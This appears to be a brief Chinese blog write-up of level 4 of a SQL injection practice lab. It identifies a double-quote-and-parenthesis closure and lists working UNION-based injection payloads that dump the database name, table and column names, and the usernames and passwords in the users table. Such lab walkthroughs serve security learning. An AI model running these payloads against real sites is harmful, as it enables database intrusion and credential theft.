less4

首先判断闭合类型。

 为双引号括号类型闭合。

然后后面的和前面的是一样的。

附个码

?id=1\

?id=1") order by 3--+

?id=1") order by 4--+

?id=-1") union select 1,2,3--+

?id=-1") union select 1,database(),version()--+

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1") union select 1,2,group_concat(username,password) from users--+

posted @ 2023-05-23 18:43  dai呆  阅读(22)  评论(0)    收藏  举报